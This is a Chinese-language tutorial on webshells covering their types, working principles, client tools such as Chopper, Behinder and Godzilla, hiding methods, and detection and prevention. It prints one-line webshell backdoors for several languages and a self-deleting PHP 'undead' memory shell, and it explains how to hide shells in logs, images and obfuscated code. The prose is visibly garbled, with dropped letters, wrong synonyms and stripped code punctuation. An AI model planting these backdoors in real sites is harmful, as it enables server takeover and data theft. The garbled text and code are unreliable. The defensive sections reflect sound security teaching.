一、什么是WebShell？

顾名思义，“eb”的含义是显然需要服务器开放WEB服务，“shell”的含义是赢得对服务器某种水平上操纵权限。ebshell经常被称为入侵者通过网站端口对网站服务器的某种水平上操纵的权限。因为ebshell其大多是以动态脚本的格式显露，也有人称之为网站的后门工具。

Webshell就是以asp、php、jsp或者cgi等网页文件格式存在的一种代码执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站目录下正常的网页文件混在一起，然后就可以采用阅读器来拜访asp或者php后门，得到一个号召执行环境，以到达管理网站服务器的目标。

应用Webshell可以在Web服务器上执行系统号召、盗取数据、植入病毒、勒索核心数据、网站挂马等恶意操纵，危害极大。

二、WebShell的特色

黑客采用Webshell的第一步通常是将其上传到可以拜访的服务器中，例如应用用户CMS系统的第三方插件中的破绽上传一个简朴的php Webshell。当然，Webshell类型和作用也不彻底雷同，一些简朴的Webshell只起到连接外界的作用，许可黑客插入更加精准的恶意脚本，执行他们所需要的指令；

另外一些则可能更加复杂，带有数据库或文件阅读器，让黑客能够从数千英里之外的场所察看入侵系统的代码和数据。无论何种设计，Webshell都极其危险，是网络罪犯和高等连续恐吓的常用工具。

Webshell常见的攻击特色主要有以下几点：

1、长久化远程拜访

Webshell脚本通常会涵盖后门，黑客上传Webshell之后，就可以充裕应用Webshell的后门实现远程拜访并管理服务器，从而到达长期管理网站服务器的目标。此外，在上传完Webshell之后，黑客会抉择自己修复破绽，以确保没有其他人会应用该破绽。通过这种方式，黑客就可以一种低调的姿态，避免与控制员进行任何交互，同时仍然牟取雷同的结局。

2、提权

在服务器没有配置过错的场合下，Webshell将在WEB服务器的用户权限下运行，而用户权限是有限的。通过Webshell，黑客可以应用系统上的本地破绽来实现权限提升，从而牟取Root权限，这样黑客根本上可以在系统上做任何事情，包括安装软件、更换权限、添加和删除用户、盗取密码、浏览电子邮件等等。

3、掩蔽性极强

Webshell可以嵌套在正常网页中运行，且不容易被查杀。它还可以穿越服务器防火墙，因为与被管理的服务器或远程主机交互的数据都是通过80端口传递，因此不会被防火墙拦截，在没有纪实流量的场合下，Webshell采用POST包发送，也不会被纪实在系统日志中，只会在Web日志中纪实一些数据提交的纪实。

三、WebShell的分类

Webshell依据脚本可以分为PHP脚本木马，ASP脚本木马，JSP脚本木马，也有基于NET的脚本木马。依据时代和专业的变迁，也有用python和lua编写的脚本木马。

常用有如下几种：

1、大马

•体积大，性能全

•会调用系统关键函数

•以代码加密进行隐藏

2、小马

•体积小，性能少

•一般只有一个上传性能，用于上传大马

3、一句话木马

•代码短•采用场景大，可单独生成文件，可插入文件

•安全性高，隐藏性强，可变形免杀

•框架不变，数据执行，数据传递

4、打包马

•主要用于打包网站源码

5、拖库马

•主要用于导出网站数据库

6、内存马

•无文件落地

•极难检测和发明

•难以清理

四、WebShell的原理

Webshell的恶意性表现在它的实现性能上，是一段带有恶意目标的正常脚本代码。

差异脚本类型的一句话木马：

evalrequest(“cmd”)

PageLanguage=”Jscript”eval(RequestItem[“cmd”],”unsafe”);

?phpeval($_POST[‘cmd’]);?

RuntimegetRuntime()exec(requestgetParameter(cmd));
这里仅对PHP的一句话木马进行解析，核心步骤如下：
1、数据的传递
•$_GET、$_POST、$_COOKIES、$_REQUEST、$_FILE、$_SERVER
•从远程远程URL中获取数据file_get_contents、curl、svn_checkout（将需要执行的指令数据放在远程URL中，通过URL_INCLUDE来读取）
•从本地磁盘文件中获取数据file、file_get_contents（将需要执行的指令数据放在本地磁盘文件中，应用IO函数来读取）
•从数据库中读取（将需要执行的指令放在数据库中，应用数据库函数来读取）
•从图片头部中获取exif_read_data（将需要执行的指令数据放在图片头部中，应用图片操纵函数来读取）
2、代码执行
将用户传输的数据进行执行
•代码执行函数：eval、assert、system…执行（这是最普通、尺度的代码执行）
•LFI：include、require（应用阅读器的伪协议将文件涵盖转化为代码执行）
•动态函数执行：（$()PHP的动态函数特征）
•Curly Syntax：（${${…}}这种思路可以把变量赋值的破绽转化为代码执行的时机）
3、内存马
有关Java内存马以及JspWebShell的免杀我盘算之后在Java代码审计中详细解说，这里就全体以PHP的脚本木马为主。
何为内存马？
内存马是无文件攻击的一种常用策略，跟着攻防演练热度越来越高：攻防双方的博弈，流量解析、EDR等技术安全器材被蓝方广泛采用，传统的文件上传的ebshll或以文件格式驻留的后门越来越容易被检测到，内存马采用越来越多。
Webshell内存马，是在内存中写入恶意后门和木马并执行，到达远程管理Web服务器的一类内存马，其瞄准了企业的对外窗口：网站、利用。
但传统的Webshell都是基于文件类型的，黑客可以应用上传工具或网站破绽植入木马，区别在于Webshell内存马是无文件马，应用中间件的进程执行某些恶意代码，不会有文件落地，给检测带来庞大难度。
4、PHP内存马
PHP内存马，也叫做PHP不死马、不死僵尸，在线下AWD中是常用策略之一。在蚁剑中也有专门的插件可以一键注入内存马。原理也很简朴，相对于Java可以直接把整个shell写入内存，php内存马的实现则是将一个木马反复写入，到达无法删除的目标。
?php
ignore_user_abort(true);设置客户端断开连接时是否中断脚本的执行
set_time_limit(0);设置脚本最大执行时间linux下可能不大好用
unlink(__FILE__);删除自身
$file=shellphp;
$code=?phpeval($_POST[cmd]);?;
hile(1){
file_put_contents($file,$code);恶意代码
usleep(5000);耽搁执行可有可无
}
?
本性上原理是不变大，执行死轮回，然后删除自身。但实际上这样做还是会有文件落地，只是控制员删不掉、删不完罢了。我们也可以用应用fastcgi对php攻击执行号召，但这样是否算一个驻留enshell还有待争议。
五、WebShell控制工具
1中国菜刀（Chopper）
中国菜刀是一款技术的网站控制软件，用途广泛，采用便捷，小巧适用。只要支持动态脚本的网站，都可以用中国菜刀来进行控制！
在非简体中文环境下采用，自动切换到英文界面。UNICODE方式编译，支持多国语言输入显示。
2蚁剑（AntSord）
中国蚁剑是一款开源的跨平台网站控制工具，它主要面向于正当授权的渗入测试安全人员以及进行常规操纵的网站控制员。任何人不得将其用于非法用途以及盈利等目标，否则后果自行承担！
采用编解码器进行流量混淆可绕过WAF，并且有多款适用插件。
项目地址：sgithubAntSordProjectantSord
3冰蝎(Behinder)
冰蝎是一款基于Java开发的动态二进制加密通讯流量的新型Webshell客户端，因为它的通讯流量被加密，采用传统的WAF、S等器材难以检测，目前在HVV中采用较多的一款工具。
项目地址：githubrebeyondBehinder
4哥斯拉(Godzilla)
哥斯拉是一款继冰蝎之后又一款于Java开发的加密通讯流量的新型Webshell客户端，内置了3种有效载荷以及6种加密器，6种支持脚本后缀，20个内置插件，也是目前在HVV中采用较多的一款工具。
项目地址：sgithubBeichenDreamGodzilla
5C刀(Cknife)
C刀是一款基于Java开发的彻底基于配置文件的中国菜刀，跨平台，脚本类型支持ASP、ASPX、PHP、JSP、JSPX、Customize
目前完成的性能有：文件控制、数据库控制、模仿终端以及代理设置等。
项目地址：sgithubChora10Cknife
6Web版菜刀（WebKnife）
WebKnife是陌小离练习ajax时候写的一款半成品Web版菜刀，目前完成的性能有：文件控制，虚拟终端，文件察看，图片察看，一键挂黑！
项目地址：sgithubMoLeftWebKnife
7XISE
XISE是小骏用易语言开发的一款相似于中国菜刀的Webshell网站控制工具，早些年做黑帽SEO的根本人手一份，现在已经停止更新，至于什么原因，大家都懂的！！！
8开山斧
开山斧是一款基于Python 27X + QT4开发的一款跨平台菜刀 (WinLinuxMac)，体积对照大，刚出来时只用过一次，现在用的人应该不多，也已经停止更新了。
项目地址：sgithubpyqtevalevlal_in
9K8飞刀
K8飞刀是K8哥哥开发的一款Webshell网站控制工具，不得不说他开发的安全工具都很强盛且适用，只不过个人感到略显臃肿，对新人来说可能不是很友好，有嗜好的可以自己去看一下。
项目地址：sgithubk8gegeK8tools
9Weevely
Weevely是一款python编写的生成和控制php ebshell的安全测试工具，目前拥有30多个模块：文件控制、号召执行、数据库控制、端口扫描等性能，部门模块不支持在Windos环境下采用。
项目地址：sgithubepinnaeevely3
10WeBaCoo
WeBaCoo是一款Perl语言编写的Web后门工具，它的特别之处在于Web服务器和客户端之间的通讯载体是Cookie，这就意味着多数的杀毒软件、网络入侵检测防备系统、网络防火墙和利用程序防火墙都无法检测到该后门的存在。当然，这只是以前的介绍，现在根本都会被检测了。
项目地址：sgithubanestisbWeBaCoo
六、WebShell隐藏
1隐藏到日志
例如，改动发送数据包的头部，添加WebShell。 eb服务器一般会保留拜访纪实到Web日志，若找到eb日志，且放到可执行目录下，可能牟取shell。
2隐藏到正当文件
例如，文件上传破绽中，将php代码放到jpg文件中，可以采用运算符，以防产生任何过错。
3混淆
删除空格、换行符等，导致代码文件对照乱，采用编码或加密来隐藏掉恶意函数名等。
七、WebShell检测与防备
1静态检测
在对日志文件进行预处置后，对日志纪实进行文本特性匹配、统计特性计算与文件关联性解析，最后对检测结局汇总，列出疑似的Webshell文件。
例如，网站目录下某php文件拜访量过少，且起源ip固定。
2动态检测
ebshell传到服务器了，黑客总要去执行它吧，ebshell执行时刻表现出来的特性，我们称为动态特性。
例如，ebshell假如执行系统号召的话，会有进程。
3ebshell扫描
点击执行操纵
ebshell文件被删除，但是SystemDrive目录还存在。
八、如何防止Webshell 渗入？
从基本上解决动态网页脚本的安全疑问，要做到防注入、防爆库、防COOKIES诱骗、防跨站攻击（xss）等等，务必配置好服务器FSO权限。最小的权限等于最大的安全。
最有效想法就是：可写目录不给执行权限，有执行权限的目录不给写权限。
具体的防止想法（以php为范例）：
1、建议用户通过ftp来上传、维护网页，尽量不安装php的上传程序。
2、对php上传程序的调用一定要进行地位认证，并只许可信任的人采用上传程序。
3、php程序控制员的用户名和密码要有一定复杂性，不能过于简朴，还要留心定期更改。
4、到正规网站下载程序，下载后要对数据库名称和寄存路径进行改动，数据库名称要有一定复杂性。
5、要尽量维持程序是最新版本。
6、不要在网页上加注后台控制程序登陆页面的链接。
7、为防范程序有未知破绽，可以在维护后删除后台控制程序的登陆页面，下次维护时再通过上传即可。
8、要时常备份数据库等重要文件。
9、日常要多维护，并留心空间中是否有来历不明的php文件。
10、尽量关闭网站搜索性能，应用外部搜索工具，以防爆出数据。
11、应用白名单上传文件，不在白名单内的一律制止上传，上传目录权限遵循最小权限原则。
12、采用防篡改系统工具，或者采用软件监控网站目录文件的操纵日志，一发明反常立刻处置。
结算：
攻击层面还应斟酌如何绕过系统上传ebshell，如何隐藏ebshell免查杀，防备方面应该斟酌如何避免ebshell被上传，如何查杀ebshell。